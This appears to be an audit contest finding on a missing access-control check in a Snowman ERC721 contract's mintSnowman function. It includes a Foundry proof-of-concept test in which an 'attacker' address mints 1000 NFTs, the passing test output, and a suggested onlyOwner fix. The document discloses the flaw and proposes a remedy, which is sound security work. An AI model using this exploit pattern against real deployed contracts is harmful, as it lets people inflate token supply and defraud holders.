Snowman::mintSnowman lacks access control, allowing anyone to mint unlimited NFTs and completely bypass the airdrop merkle/staking mechanism
Description
The Snowman ERC721 contract is intended to mint NFTs only to legitimate stakers of the Snow token via the SnowmanAirdrop contract, after successful merkle proof and ECDSA signature validation.
The mintSnowman function is declared external with no onlyOwner, no airdrop-only modifier, and no require check on msg.sender. Any address on the network can call it with arbitrary receiver
and amount and mint as many NFTs as desired for free.
Risk
Likelihood:
-
A single external EOA or contract call to
Snowman.mintSnowman(attacker, anyAmount)succeeds on every block; no precondition required. -
The bug is reachable from the moment of deployment, with no special state needed.
Impact:
-
The entire airdrop mechanism (Snow staking, merkle tree, ECDSA signature, balance check, single-claim flag) is bypassed in one call.
-
An attacker mints unlimited Snowman NFTs, destroying scarcity and the protocol's intended distribution.
-
s_TokenCounteradvances unboundedly, so legitimate airdrop claimants receive token IDs interleaved with attacker-minted ones, making distinction impossible.
Proof of Concept
The following Foundry test deploys a fresh Snowman contract and demonstrates that any random EOA can immediately call mintSnowman to mint thousands of NFTs to itself and to a victim, without being
the contract owner, without going through the airdrop, and without holding any Snow tokens or merkle proof. The test passes on a clean deployment with no preconditions, proving the trivial reachability
of the bug.
The test demonstrates two distinct exploitation vectors in a single transaction: minting to self for direct value extraction, and minting to an arbitrary victim for supply dilution and griefing. Both
succeed without any role or balance preconditions.
Recommended Mitigation
Restrict mintSnowman to a single authorized caller: the SnowmanAirdrop contract. The pattern below introduces an s_airdropContract state variable settable only by the owner, plus a sender check at
the top of mintSnowman. The previously unused Ownable inheritance is now leveraged, eliminating the dead-code concern at the same time.
After deployment, the owner registers the airdrop contract address once via setAirdropContract. Any direct external mint attempt reverts with SM__NotAirdropContract, restoring the intended
airdrop-gated NFT distribution and preserving the 1:1 staked-Snow-to-Snowman ratio.
Lead Judging Commences
[H-01] Unrestricted NFT Minting in Snowman.sol
# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.